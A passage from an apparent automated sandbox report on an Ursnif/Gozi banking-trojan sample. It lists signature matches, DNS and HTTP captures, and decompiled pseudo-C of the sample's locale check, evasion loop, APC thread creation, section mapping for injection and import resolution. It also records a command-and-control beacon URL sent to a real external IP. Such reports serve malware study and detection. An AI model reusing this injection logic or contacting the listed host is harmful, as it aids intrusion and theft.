SetStdHandle, CreateFileW
USER32.dll | LoadMenuW
ADVAPI32.dll | LookupAccountSidW
                  Language of compilation system | Country where language is spoken | Map
                  Sami Lappish | Finland |
                  Sami Lappish | Norway |
                  Sami Lappish | Sweden |
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  03/14/23-16:02:33.550566 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Mar 14, 2023 16:02:33.490955114 CET | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Mar 14, 2023 16:02:33.550028086 CET | 80 | 49680 | 62.173.142.51 | 192.168.2.5
                  Mar 14, 2023 16:02:33.550132990 CET | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Mar 14, 2023 16:02:33.550565958 CET | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Mar 14, 2023 16:02:33.609353065 CET | 80 | 49680 | 62.173.142.51 | 192.168.2.5
                  Mar 14, 2023 16:02:33.609383106 CET | 80 | 49680 | 62.173.142.51 | 192.168.2.5
                  Mar 14, 2023 16:02:33.609524965 CET | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Mar 14, 2023 16:02:33.612766027 CET | 49680 | 80 | 192.168.2.5 | 62.173.142.51
                  Mar 14, 2023 16:02:33.671506882 CET | 80 | 49680 | 62.173.142.51 | 192.168.2.5
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Mar 14, 2023 16:01:13.337074041 CET | 61325 | 53 | 192.168.2.5 | 8.8.8.8
                  Mar 14, 2023 16:01:13.363226891 CET | 53 | 61325 | 8.8.8.8 | 192.168.2.5
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Mar 14, 2023 16:01:13.337074041 CET | 192.168.2.5 | 8.8.8.8 | 0xce38 | Standard query (0) | checklist.skype.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Mar 14, 2023 16:01:13.363226891 CET | 8.8.8.8 | 192.168.2.5 | 0xce38 | Name error (3) | checklist.skype.com | none | none | A (IP address) | IN (0x0001) | false
                  • 62.173.142.51
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  0 | 192.168.2.5 | 49680 | 62.173.142.51 | 80 | C:\Users\user\Desktop\server.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Mar 14, 2023 16:02:33.550565958 CET | 3 | OUT | GET /drew/kjSOZcm1saisXVulw/nMJdjuoxI5rY/D8rf0rwxZvy/xTo4u6qyfG2cqh/DrEm9eSMLtL3Mt_2BWc8v/UHxdAMkcyeaROQd9/EwiLplzlm9gCiDQ/KqEVG_2BN1u2apPrXD/iYwyB9P6y/3dh1O1SBALUj6nSMRJfH/HHlM5d4xQO9d95rkA_2/Bt59zcQMsfJpOgJC8GeSrH/5REGnF8guLwya/xQ1cfd2Y/w3tCRH4bjXIzu_2B_2F_2B5/MmfV_2FK_2/B5ux_2BgxJ6omqMfT/iSBh1mrWB9_2/BRaJgBOq4gEVdF7OIVd_2B/4.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: 62.173.142.51
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Target ID:0
                  Start time:16:00:49
                  Start date:14/03/2023
                  Path:C:\Users\user\Desktop\server.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\server.exe
                  Imagebase:0x400000
                  File size:192000 bytes
                  MD5 hash:8F092511C91BFC1F2516E420739A7967
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494639050.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494532027.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.580772569.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494557591.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494507047.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494595207.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494478374.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.580453253.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.580553464.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494674831.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.494622294.0000000002C68000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:low


                    Execution Graph

                    Execution Coverage:21.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:32.1%
                    Total number of Nodes:249
                    Total number of Limit Nodes:14
                    [Execution graph omitted: rendered-graph node and edge data. The nodes cover the original image at 0x401000 (HeapCreate, GetModuleHandleA, GetCommandLineW, CreateEventA, GetVersion, OpenProcess, NtQuerySystemInformation, RtlAllocateHeap, RtlFreeHeap, Sleep, GetLocaleInfoA, GetSystemDefaultUILanguage, VerLanguageNameA, GetModuleFileNameW, GetLongPathNameW, CreateThread, QueueUserAPC, WaitForSingleObject, GetExitCodeThread, CreateFileMappingW, MapViewOfFile, NtCreateSection, NtMapViewOfSection, VirtualProtect) and the code at 0x540000 (GetPEB, SetErrorMode, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, GetProcAddress, RtlExitUserThread).]

                    Callgraph

                    [Callgraph omitted: rendered-graph data listing Function_XXXXXXXX nodes in the 0x401000 and 0x540000 regions and their call edges; the legend distinguishes executed from not-executed functions, with opacity indicating relevance and a marker for disassembly availability.]

                    Control-flow Graph

                    C-Code - Quality: 85%
                    			E004019F1() {
                    				long _v8;
                    				char _v12;
                    				char _v16;
                    				void* _v40;
                    				long _t28;
                    				long _t30;
                    				long _t31;
                    				signed short _t33;
                    				void* _t37;
                    				long _t40;
                    				long _t41;
                    				void* _t48;
                    				intOrPtr _t50;
                    				signed int _t57;
                    				signed int _t58;
                    				long _t63;
                    				long _t65;
                    				intOrPtr _t66;
                    				void* _t71;
                    				void* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				void* _t82;
                    				intOrPtr* _t83;
                    
                    				_t28 = E00401D68();
                    				_v8 = _t28;
                    				if(_t28 != 0) {
                    					return _t28;
                    				}
                    				do {
                    					_t77 = 0;
                    					_v12 = 0;
                    					_t63 = 0x30;
                    					do {
                    						_t71 = E004012E6(_t63);
                    						if(_t71 == 0) {
                    							_v8 = 8;
                    						} else {
                    							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                    							_t67 = _t57;
                    							_t58 = _t57 & 0x0000ffff;
                    							_v8 = _t58;
                    							if(_t58 == 4) {
                    								_t63 = _t63 + 0x30;
                    							}
                    							_t78 = 0x13;
                    							_t10 = _t67 + 1; // 0x1
                    							_t77 =  *_t71 % _t78 + _t10;
                    							E00401BA9(_t71);
                    						}
                    					} while (_v8 != 0);
                    					_t30 = E00401688(_t77); // executed
                    					_v8 = _t30;
                    					Sleep(_t77 << 4); // executed
                    					_t31 = _v8;
                    				} while (_t31 == 0x15);
                    				if(_t31 != 0) {
                    					L30:
                    					return _t31;
                    				}
                    				_v12 = 0;
                    				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                    				if(_t33 == 0) {
                    					__imp__GetSystemDefaultUILanguage();
                    					_t67 =  &_v12;
                    					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                    				}
                    				if(_v12 == 0x5552) {
                    					L28:
                    					_t31 = _v8;
                    					if(_t31 == 0xffffffff) {
                    						_t31 = GetLastError();
                    					}
                    					goto L30;
                    				} else {
                    					if(E00401800(_t67,  &_v16) != 0) {
                    						 *0x404178 = 0;
                    						L20:
                    						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
                    						_t82 = _t37;
                    						if(_t82 == 0) {
                    							L27:
                    							_v8 = GetLastError();
                    							goto L28;
                    						}
                    						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                    						if(_t40 == 0) {
                    							_t65 = GetLastError();
                    							TerminateThread(_t82, _t65);
                    							CloseHandle(_t82);
                    							_t82 = 0;
                    							SetLastError(_t65);
                    						}
                    						if(_t82 == 0) {
                    							goto L27;
                    						} else {
                    							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                    							_v8 = _t41;
                    							if(_t41 == 0) {
                    								GetExitCodeThread(_t82,  &_v8);
                    							}
                    							CloseHandle(_t82);
                    							goto L28;
                    						}
                    					}
                    					_t66 = _v16;
                    					_t83 = __imp__GetLongPathNameW;
                    					_t48 =  *_t83(_t66, 0, 0); // executed
                    					_t75 = _t48;
                    					if(_t75 == 0) {
                    						L18:
                    						 *0x404178 = _t66;
                    						goto L20;
                    					}
                    					_t22 = _t75 + 2; // 0x2
                    					_t50 = E004012E6(_t75 + _t22);
                    					 *0x404178 = _t50;
                    					if(_t50 == 0) {
                    						goto L18;
                    					}
                    					 *_t83(_t66, _t50, _t75); // executed
                    					E00401BA9(_t66);
                    					goto L20;
                    				}
                    			}

                    APIs
                      • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                      • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                      • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                      • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                      • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                    • NtQuerySystemInformation.NTDLL ref: 00401A26
                    • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                    • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                    • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
                    • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
                    • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                    • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                    • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                    • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                    • String ID:
                    • API String ID: 3475612337-0
                    • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                    • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                    • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                    • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x4015b0-0x40167f)
                    C-Code - Quality: 69%
                    			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                    				intOrPtr _v12;
                    				struct _FILETIME* _v16;
                    				short _v60;
                    				struct _FILETIME* _t14;
                    				intOrPtr _t15;
                    				long _t18;
                    				void* _t19;
                    				void* _t22;
                    				intOrPtr _t31;
                    				long _t32;
                    				void* _t34;
                    
                    				_t31 = __edx;
                    				_t14 =  &_v16;
                    				GetSystemTimeAsFileTime(_t14);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v12);
                    				_push(_v16);
                    				L00402026();
                    				_push(_t14);
                    				_v16 = _t14;
                    				_t15 =  *0x404184;
                    				_push(_t15 + 0x4051ca);
                    				_push(_t15 + 0x4051c0);
                    				_push(0x16);
                    				_push( &_v60);
                    				_v12 = _t31;
                    				L00402020();
                    				_t18 = _a4;
                    				if(_t18 == 0) {
                    					_t18 = 0x1000;
                    				}
                    				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                    				_t34 = _t19;
                    				if(_t34 == 0) {
                    					_t32 = GetLastError();
                    				} else {
                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                    						if(_t22 == 0) {
                    							_t32 = GetLastError();
                    							if(_t32 != 0) {
                    								goto L9;
                    							}
                    						} else {
                    							 *_a8 = _t34;
                    							 *_a12 = _t22;
                    							_t32 = 0;
                    						}
                    					} else {
                    						_t32 = 2;
                    						L9:
                    						CloseHandle(_t34);
                    					}
                    				}
                    				return _t32;
                    			}

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                    • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                    • String ID:
                    • API String ID: 3812556954-0
                    • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                    • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                    • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x40110b-0x4011b0)
                    C-Code - Quality: 72%
                    			E0040110B(intOrPtr* __eax, void** _a4) {
                    				int _v12;
                    				void* _v16;
                    				void* _v20;
                    				void* _v24;
                    				int _v28;
                    				int _v32;
                    				intOrPtr _v36;
                    				int _v40;
                    				int _v44;
                    				void* _v48;
                    				void* __esi;
                    				long _t34;
                    				void* _t39;
                    				void* _t47;
                    				intOrPtr* _t48;
                    
                    				_t48 = __eax;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v24 =  *((intOrPtr*)(__eax + 4));
                    				_v16 = 0;
                    				_v12 = 0;
                    				_v48 = 0x18;
                    				_v44 = 0;
                    				_v36 = 0x40;
                    				_v40 = 0;
                    				_v32 = 0;
                    				_v28 = 0;
                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                    				if(_t34 < 0) {
                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                    				} else {
                    					 *_t48 = _v16;
                    					_t39 = E00401459(_t48,  &_v12); // executed
                    					_t47 = _t39;
                    					if(_t47 != 0) {
                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                    					} else {
                    						memset(_v12, 0, _v24);
                    						 *_a4 = _v12;
                    					}
                    				}
                    				return _t47;
                    			}

                    APIs
                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76684EE0,00000000,00000000,?), ref: 00401168
                      • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                    • memset.NTDLL ref: 0040118A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: Section$CreateViewmemset
                    • String ID: @
                    • API String ID: 2533685722-2766056989
                    • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                    • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                    • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                    • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x401000-0x401108)
                    C-Code - Quality: 100%
                    			E00401000(void* __edi, intOrPtr _a4) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				_Unknown_base(*)()** _v16;
                    				signed int _v20;
                    				signed short _v24;
                    				struct HINSTANCE__* _v28;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t47;
                    				intOrPtr* _t49;
                    				intOrPtr _t50;
                    				signed short _t51;
                    				_Unknown_base(*)()* _t53;
                    				CHAR* _t54;
                    				_Unknown_base(*)()* _t55;
                    				void* _t58;
                    				signed int _t59;
                    				_Unknown_base(*)()* _t60;
                    				intOrPtr _t61;
                    				intOrPtr _t65;
                    				signed int _t68;
                    				void* _t69;
                    				CHAR* _t71;
                    				signed short* _t73;
                    
                    				_t69 = __edi;
                    				_v20 = _v20 & 0x00000000;
                    				_t59 =  *0x404180;
                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                    				if(_t43 != 0) {
                    					_t45 = _t43 + __edi;
                    					_v12 = _t45;
                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                    					if(_t46 != 0) {
                    						while(1) {
                    							_t71 = _t46 + _t69;
                    							_t47 = LoadLibraryA(_t71); // executed
                    							_v28 = _t47;
                    							if(_t47 == 0) {
                    								break;
                    							}
                    							_v24 = _v24 & 0x00000000;
                    							 *_t71 = _t59 - 0x43175ac3;
                    							_t49 = _v12;
                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                    							_t50 =  *_t49;
                    							if(_t50 != 0) {
                    								L6:
                    								_t73 = _t50 + _t69;
                    								_v16 = _t61 + _t69;
                    								while(1) {
                    									_t51 =  *_t73;
                    									if(_t51 == 0) {
                    										break;
                    									}
                    									if(__eflags < 0) {
                    										__eflags = _t51 - _t69;
                    										if(_t51 < _t69) {
                    											L12:
                    											_t21 =  &_v8;
                    											 *_t21 = _v8 & 0x00000000;
                    											__eflags =  *_t21;
                    											_v24 =  *_t73 & 0x0000ffff;
                    										} else {
                    											_t65 = _a4;
                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                    												goto L12;
                    											} else {
                    												goto L11;
                    											}
                    										}
                    									} else {
                    										_t51 = _t51 + _t69;
                    										L11:
                    										_v8 = _t51;
                    									}
                    									_t53 = _v8;
                    									__eflags = _t53;
                    									if(_t53 == 0) {
                    										_t54 = _v24 & 0x0000ffff;
                    									} else {
                    										_t54 = _t53 + 2;
                    									}
                    									_t55 = GetProcAddress(_v28, _t54);
                    									__eflags = _t55;
                    									if(__eflags == 0) {
                    										_v20 = _t59 - 0x43175a44;
                    									} else {
                    										_t68 = _v8;
                    										__eflags = _t68;
                    										if(_t68 != 0) {
                    											 *_t68 = _t59 - 0x43175ac3;
                    										}
                    										 *_v16 = _t55;
                    										_t58 = _t59 * 4 - 0xc5d6b08;
                    										_t73 = _t73 + _t58;
                    										_t32 =  &_v16;
                    										 *_t32 = _v16 + _t58;
                    										__eflags =  *_t32;
                    										continue;
                    									}
                    									goto L23;
                    								}
                    							} else {
                    								_t50 = _t61;
                    								if(_t61 != 0) {
                    									goto L6;
                    								}
                    							}
                    							L23:
                    							_v12 = _v12 + 0x14;
                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                    							if(_t46 != 0) {
                    								continue;
                    							} else {
                    							}
                    							L26:
                    							goto L27;
                    						}
                    						_t60 = _t59 + 0xbce8a5bb;
                    						__eflags = _t60;
                    						_v20 = _t60;
                    						goto L26;
                    					}
                    				}
                    				L27:
                    				return _v20;
                    			}

                    APIs
                    • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
                    • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_server.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID:
                    • API String ID: 2574300362-0
                    • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                    • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                    • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                    • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    (graph image not reproduced in this extraction; basic blocks cover 0x401459-0x401498)
                    C-Code - Quality: 68%
                    			E00401459(void** __esi, PVOID* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void* _v16;
                    				long _t13;
                    
                    				_v16 = 0;
                    				asm("stosd");
                    				_v8 = 0;
                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                    				if(_t13 < 0) {
                    					_push(_t13);
                    					return __esi[6]();
                    				}
                    				return 0;
                    			}

                    APIs
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                    Memory Dump Source
                    • Source File: 00000000.00000002.580373097.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.580373097.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.580373097.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
